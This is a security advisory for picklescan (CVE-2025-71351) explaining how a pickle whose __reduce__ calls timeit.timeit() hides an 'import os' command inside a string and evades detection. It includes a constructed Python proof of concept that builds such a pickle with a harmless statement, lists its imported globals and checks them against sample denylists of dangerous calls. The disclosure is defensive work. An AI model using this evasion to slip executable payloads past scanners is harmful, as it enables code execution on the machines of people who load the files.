PT-2026-51215 · Picklescan · Picklescan
Seaw1Nd · Published 2026-06-21 · Updated 2026-06-21
CVE-2025-71351
CVSS v4.0: 7.6 (High)
| Vector | AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
picklescan before 0.0.25 fails to detect malicious pickle files whose __reduce__ method returns timeit.timeit() as the callable, allowing remote code execution. The statement handed to timeit.timeit() is an ordinary string, so an attacker can place "import os" and an arbitrary system command inside it: the only global the pickle itself imports is timeit.timeit, which evades picklescan's detection, and the command executes when pickle.load() is called.
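The following is an added, constructed demonstration of the gap described above; it is not code from the advisory, from the reporter, or from picklescan itself. It builds a pickle whose __reduce__ calls timeit.timeit() with a benign statement (the statement only sets an environment variable so that execution at load time can be observed), lists the globals the pickle actually imports, and scans it against two hypothetical denylists: one that names os/subprocess but not timeit, and one that adds timeit. The denylist contents, the marker variable and all helper names are assumptions for illustration.

```python
import os
import pickle
import pickletools
import time
import timeit

# Constructed demo marker (assumption): the pickled statement only sets this
# environment variable, so execution at load time is observable in-process.
MARKER_VAR = "PICKLESCAN_DEMO_RAN"

STRING_OPS = ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "BINSTRING", "SHORT_BINSTRING")


class TimeitPayload:
    """Object whose __reduce__ makes pickle.load() call timeit.timeit()."""

    def __init__(self, stmt):
        self.stmt = stmt

    def __reduce__(self):
        # timeit.timeit(stmt, setup, timer, number): the timer is passed
        # positionally because REDUCE cannot carry keyword arguments, and
        # number=1 stops the statement from running a million times.
        return (timeit.timeit, (self.stmt, "pass", time.perf_counter, 1))


def build_payload():
    """Pickle bytes whose 'import os' lives inside a string, not an import opcode."""
    stmt = f"import os; os.environ['{MARKER_VAR}'] = 'ran'"
    return pickle.dumps(TimeitPayload(stmt), protocol=4)


def imported_globals(data):
    """Return the (module, name) pairs a pickle resolves via GLOBAL / STACK_GLOBAL.

    Only the values the pickler pushes just before STACK_GLOBAL are tracked,
    with enough memo handling that a BINGET of a memoized string resolves.
    """
    found, memo, recent = [], {}, []
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name == "MEMOIZE":                      # memo[len(memo)] = top of stack
            memo[len(memo)] = recent[-1] if recent else None
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = recent[-1] if recent else None
        elif name in ("PROTO", "FRAME", "STOP"):
            continue
        elif name in STRING_OPS:
            recent.append(arg)
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            recent.append(memo.get(arg))
        elif name == "GLOBAL":                     # protocol <= 3: "module name"
            module, attr = arg.split(" ", 1)
            found.append((module, attr))
            recent.append(None)
        elif name == "STACK_GLOBAL":               # protocol >= 4: two strings on the stack
            found.append((recent[-2], recent[-1]))
            recent.append(None)
        else:                                      # anything else produces a non-string value
            recent.append(None)
    return found


# Hypothetical denylists for illustration; these are not picklescan's own lists.
NAIVE_DENYLIST = {
    ("os", "system"), ("posix", "system"), ("subprocess", "Popen"),
    ("builtins", "eval"), ("builtins", "exec"),
}
HARDENED_DENYLIST = NAIVE_DENYLIST | {
    ("timeit", "timeit"), ("timeit", "repeat"), ("timeit", "Timer"),
}


def scan(data, denylist):
    """Denylist scan over the globals a pickle imports; returns the matches."""
    return [g for g in imported_globals(data) if g in denylist]


def run_demo():
    """Scan the payload with both lists, then load it and report whether it ran."""
    data = build_payload()
    os.environ.pop(MARKER_VAR, None)
    naive_hits = scan(data, NAIVE_DENYLIST)        # empty: 'os' only appears inside a string
    hardened_hits = scan(data, HARDENED_DENYLIST)  # [('timeit', 'timeit')]
    pickle.loads(data)  # runs the statement via timeit.timeit() in this process
    return naive_hits, hardened_hits, os.environ.get(MARKER_VAR)


if __name__ == "__main__":
    naive, hardened, marker = run_demo()
    print("naive denylist hits:   ", naive)
    print("hardened denylist hits:", hardened)
    print("statement executed at load:", marker == "ran")
```

The point to take from running it: os never shows up as a pickle import. It is imported inside the statement string, which an opcode-level scanner sees as data, and the only global the file resolves is timeit.timeit (plus the timer it is handed). A scanner whose disallowed list does not name timeit therefore reports the file clean, and the statement runs the moment pickle.loads() is reached; this is exactly the incomplete-denylist weakness the advisory classifies the issue under.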
Fix
Upgrade picklescan to 0.0.25 or later.
Weakness Enumeration
CWE-184: Incomplete List of Disallowed Inputs
Related Identifiers
CVE-2025-71351
Affected Products
Picklescan (versions before 0.0.25)